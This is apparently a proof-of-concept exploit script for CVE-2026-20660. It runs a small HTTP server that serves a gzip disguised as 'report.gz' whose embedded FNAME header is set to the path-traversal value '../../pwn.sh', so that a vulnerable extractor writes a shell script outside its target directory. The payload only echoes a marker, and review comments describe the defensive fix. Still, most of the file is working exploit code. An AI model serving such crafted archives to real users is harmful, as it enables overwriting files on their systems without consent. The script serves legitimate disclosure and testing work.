#!/usr/bin/env python3
"""
CVE-2026-20660 PoC variant: write ../../pwn.sh via gzip FNAME.
"""
import argparse
import http.server
import sys
from datetime import datetime
from server import make_gzip_with_fname
# Content of the file carried inside the gzip stream: a two-line shell script
# that only echoes a marker string.
PAYLOAD = b'#!/bin/sh\n\necho "PWNED."\n'
# Name passed to make_gzip_with_fname() by the /download handler. It is a
# relative path with two ".." segments, not a bare file name.
# NOTE(review): where this resolves on disk depends on the directory the
# consumer extracts into, which this file does not control; the "~/pwn.sh"
# wording below is an assumption about that directory.
FNAME = "../../pwn.sh"
# Static HTML served at "/": a description of the test and a link to /download.
# The FNAME and payload shown in the <pre> block are hard-coded text and are
# not derived from the constants above, so they must be edited together.
LANDING = b"""\
<!DOCTYPE html>
<html><head><title>Overwrite PoC</title>
<style>
body{font-family:monospace;background:#111;color:#eee;padding:40px}
a.btn{display:inline-block;padding:14px 28px;background:#f00;color:#fff;
text-decoration:none;border-radius:6px;font-size:18px;margin:16px 0}
</style>
</head><body>
<h1>CVE-2026-20660 - overwrite ~/pwn.sh</h1>
<pre>FNAME: ../../pwn.sh
Payload: #!/bin/sh; echo "PWNED."</pre>
<a class="btn" href="/download">Trigger</a>
</body></html>
"""
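class Handler(http.server.BaseHTTPRequestHandler):
    """Serve the PoC landing page and the crafted gzip download.

    Routes:
        /            -> the static LANDING page.
        /download... -> a gzip built by make_gzip_with_fname(PAYLOAD, FNAME),
                        sent as an attachment named "report.gz".
        anything else -> 404.

    make_gzip_with_fname comes from the project's ``server`` module and is
    not visible in this file; presumably it stores FNAME in the gzip header's
    FNAME field (see the module docstring) -- confirm against that module.

    Defensive reading: the Content-Disposition name ("report.gz") and the
    name embedded in the archive differ, so a consumer that trusts the
    embedded name sees a path the user never approved. RFC 1952 defines the
    FNAME field as a bare file name, so an extractor that honours it should
    reduce it to a basename and refuse path separators and ".." segments.
    """

    # Maps C0 controls, DEL, C1 controls and the backslash to visible escapes.
    # The request line logged by the base class is client-controlled; without
    # this table, overriding log_message() would write raw control bytes
    # (e.g. terminal escape sequences) to the operator's terminal.
    _LOG_ESCAPES = {
        **{code: f"\\x{code:02x}" for code in (*range(0x20), *range(0x7F, 0xA0))},
        ord("\\"): "\\\\",
    }

    def do_GET(self):
        """Dispatch a GET request to the landing page, the download, or 404."""
        if self.path == "/":
            self.send_response(200)
            self.send_header("Content-Type", "text/html; charset=utf-8")
            self.send_header("Content-Length", str(len(LANDING)))
            self.end_headers()
            self.wfile.write(LANDING)
            return

        # Prefix match: "/download" followed by anything (query string,
        # extra path characters) is served the same archive.
        if self.path.startswith("/download"):
            # The archive is rebuilt on every request rather than cached.
            gz_data = make_gzip_with_fname(PAYLOAD, FNAME)
            print(f"\nTRIGGERED: FNAME={FNAME}, size={len(gz_data)}, client={self.client_address[0]}")
            self.send_response(200)
            self.send_header("Content-Type", "application/gzip")
            self.send_header("Content-Disposition", 'attachment; filename="report.gz"')
            self.send_header("Content-Length", str(len(gz_data)))
            # Ask the client not to keep a cached copy of the test archive.
            self.send_header("Cache-Control", "no-store")
            self.end_headers()
            self.wfile.write(gz_data)
            return

        self.send_error(404)

    def log_message(self, fmt, *args):
        """Write one timestamped log line to stderr.

        Args:
            fmt: %-style format string supplied by the base class.
            *args: Values for ``fmt``; these include the raw request line.

        The formatted message is passed through _LOG_ESCAPES before it is
        written, so control characters sent by a client appear as ``\\xNN``
        instead of being interpreted by the terminal or splitting log lines.
        """
        line = (fmt % args).translate(self._LOG_ESCAPES)
        sys.stderr.write(f"[{datetime.now():%H:%M:%S}] {line}\n")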
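def main():
    """Parse --port/--bind, start the HTTP server, and serve until interrupted.

    The listening socket is closed on every exit path, not only on Ctrl-C,
    so an unexpected error in serve_forever() does not leave the port bound.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument("--port", "-p", type=int, default=9999)
    # The default address listens on every interface, so any host that can
    # route to this machine can fetch /download. The help text says so,
    # because the default itself is kept for compatibility.
    parser.add_argument(
        "--bind",
        "-b",
        default="0.0.0.0",
        help=(
            "address to listen on (default 0.0.0.0 = all interfaces; pass "
            "127.0.0.1 or an isolated lab address to limit who can reach "
            "/download)"
        ),
    )
    args = parser.parse_args()

    server = http.server.HTTPServer((args.bind, args.port), Handler)
    print(f"\nOverwrite PoC on http://{args.bind}:{args.port}/")
    print(f"FNAME: {FNAME}")
    # NOTE(review): this line is fixed text; the real location depends on
    # the consumer's extraction directory, which this script cannot see.
    print("Target: ~/pwn.sh")
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        # Ctrl-C is the normal way to stop the server; exit quietly.
        pass
    finally:
        server.server_close()


if __name__ == "__main__":
    main()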